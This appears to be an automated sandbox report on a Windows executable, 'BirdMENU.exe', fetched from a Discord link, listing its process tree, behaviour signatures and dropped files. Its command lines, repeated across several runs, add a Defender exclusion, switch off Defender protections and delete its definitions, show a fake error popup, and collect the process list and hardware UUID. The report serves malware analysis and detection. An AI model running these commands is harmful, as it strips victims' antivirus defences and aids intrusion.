Analysis

  • max time kernel
    70s
  • max time network
    66s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    09/11/2024, 13:54

General

  • Target

    https://cdn.discordapp.com/attachments/1304805438881140778/1304806116483399770/BirdMENU.exe?ex=6730bae4&is=672f6964&hm=06d680a9f82a97c40f023b335f5eeafd0ba20220b7bdde4a9349b6f5962e3cef&

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1304805438881140778/1304806116483399770/BirdMENU.exe?ex=6730bae4&is=672f6964&hm=06d680a9f82a97c40f023b335f5eeafd0ba20220b7bdde4a9349b6f5962e3cef&
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b7e846f8,0x7ff8b7e84708,0x7ff8b7e84718
      2⤵
        PID:3168
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
        2⤵
          PID:4040
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3100
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
          2⤵
            PID:2044
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
            2⤵
              PID:2876
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
              2⤵
                PID:4028
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
                2⤵
                  PID:2292
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1780
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4676 /prefetch:8
                  2⤵
                    PID:3668
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
                    2⤵
                      PID:4424
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5956 /prefetch:8
                      2⤵
                        PID:3564
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5032
                      • C:\Users\Admin\Downloads\BirdMENU.exe
                        "C:\Users\Admin\Downloads\BirdMENU.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:3192
                        • C:\Users\Admin\Downloads\BirdMENU.exe
                          "C:\Users\Admin\Downloads\BirdMENU.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3576
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                            4⤵
                              PID:5368
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5788
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                              4⤵
                                PID:5376
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  5⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5796
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                4⤵
                                  PID:5388
                                  • C:\Windows\system32\mshta.exe
                                    mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                    5⤵
                                      PID:5804
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                    4⤵
                                      PID:5444
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist /FO LIST
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5716
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                      4⤵
                                        PID:5596
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic csproduct get uuid
                                          5⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5744
                                  • C:\Users\Admin\Downloads\BirdMENU.exe
                                    "C:\Users\Admin\Downloads\BirdMENU.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:5296
                                    • C:\Users\Admin\Downloads\BirdMENU.exe
                                      "C:\Users\Admin\Downloads\BirdMENU.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:5496
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                                        4⤵
                                          PID:5216
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5952
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                          4⤵
                                            PID:5228
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5784
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                            4⤵
                                              PID:5268
                                              • C:\Windows\system32\mshta.exe
                                                mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                                5⤵
                                                  PID:5912
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                4⤵
                                                  PID:5324
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    5⤵
                                                    • Enumerates processes with tasklist
                                                    PID:5276
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                  4⤵
                                                    PID:5360
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5832
                                              • C:\Users\Admin\Downloads\BirdMENU.exe
                                                "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:5196
                                                • C:\Users\Admin\Downloads\BirdMENU.exe
                                                  "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:4072
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                                                    4⤵
                                                      PID:6092
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                                        5⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5664
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                      4⤵
                                                        PID:6100
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5816
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                                        4⤵
                                                          PID:6140
                                                          • C:\Windows\system32\mshta.exe
                                                            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                                            5⤵
                                                              PID:5668
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            4⤵
                                                              PID:5904
                                                              • C:\Windows\system32\tasklist.exe
                                                                tasklist /FO LIST
                                                                5⤵
                                                                • Enumerates processes with tasklist
                                                                PID:5364
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                              4⤵
                                                                PID:5620
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic csproduct get uuid
                                                                  5⤵
                                                                    PID:5508
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
                                                              2⤵
                                                                PID:5604
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
                                                                2⤵
                                                                  PID:5916
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
                                                                  2⤵
                                                                    PID:5208
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,8676553472491080443,118513299474032256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
                                                                    2⤵
                                                                      PID:5740
                                                                    • C:\Users\Admin\Downloads\BirdMENU.exe
                                                                      "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:5300
                                                                      • C:\Users\Admin\Downloads\BirdMENU.exe
                                                                        "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:5348
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                                                                          4⤵
                                                                            PID:5816
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                                                              5⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:3612
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                            4⤵
                                                                              PID:1336
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                5⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:5380
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                                                              4⤵
                                                                                PID:6020
                                                                                • C:\Windows\system32\mshta.exe
                                                                                  mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                                                                  5⤵
                                                                                    PID:5660
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                  4⤵
                                                                                    PID:5136
                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                      tasklist /FO LIST
                                                                                      5⤵
                                                                                      • Enumerates processes with tasklist
                                                                                      PID:5944
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                    4⤵
                                                                                      PID:3680
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic csproduct get uuid
                                                                                        5⤵
                                                                                          PID:668
                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2408
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:1812
                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                      1⤵
                                                                                        PID:5416
                                                                                      • C:\Users\Admin\Downloads\BirdMENU.exe
                                                                                        "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5684
                                                                                        • C:\Users\Admin\Downloads\BirdMENU.exe
                                                                                          "C:\Users\Admin\Downloads\BirdMENU.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6032
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'"
                                                                                            3⤵
                                                                                              PID:4728
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BirdMENU.exe'
                                                                                                4⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:5764
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                              3⤵
                                                                                                PID:3540
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                  4⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:6004
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()""
                                                                                                3⤵
                                                                                                  PID:3776
                                                                                                  • C:\Windows\system32\mshta.exe
                                                                                                    mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOT INSTALLED THIS CORRECT ASK FOR HELP', 0, 'ERROR', 32+16);close()"
                                                                                                    4⤵
                                                                                                      PID:4580
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                    3⤵
                                                                                                      PID:2540
                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                        tasklist /FO LIST
                                                                                                        4⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        PID:5692
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                      3⤵
                                                                                                        PID:6096
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic csproduct get uuid
                                                                                                          4⤵
                                                                                                            PID:6064

                                                                                                    Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                            Filesize

                                                                                                            152B

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                            Filesize

                                                                                                            152B

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                            Filesize

                                                                                                            186B

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                            Filesize

                                                                                                            5KB

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                            Filesize

                                                                                                            6KB

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                            Filesize

                                                                                                            16B

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                            Filesize

                                                                                                            10KB

                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                            Filesize

                                                                                                            10KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\VCRUNTIME140.dll

                                                                                                            Filesize

                                                                                                            116KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_bz2.pyd

                                                                                                            Filesize

                                                                                                            48KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_ctypes.pyd

                                                                                                            Filesize

                                                                                                            58KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_decimal.pyd

                                                                                                            Filesize

                                                                                                            106KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_hashlib.pyd

                                                                                                            Filesize

                                                                                                            35KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_lzma.pyd

                                                                                                            Filesize

                                                                                                            86KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_queue.pyd

                                                                                                            Filesize

                                                                                                            25KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_socket.pyd

                                                                                                            Filesize

                                                                                                            43KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_sqlite3.pyd

                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\_ssl.pyd

                                                                                                            Filesize

                                                                                                            65KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\base_library.zip

                                                                                                            Filesize

                                                                                                            1.4MB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\blank.aes

                                                                                                            Filesize

                                                                                                            127KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\libcrypto-3.dll

                                                                                                            Filesize

                                                                                                            1.6MB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\libffi-8.dll

                                                                                                            Filesize

                                                                                                            29KB

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI31922\libssl-3.dll

                                                                                                            Filesize

                                                                                                            223KB

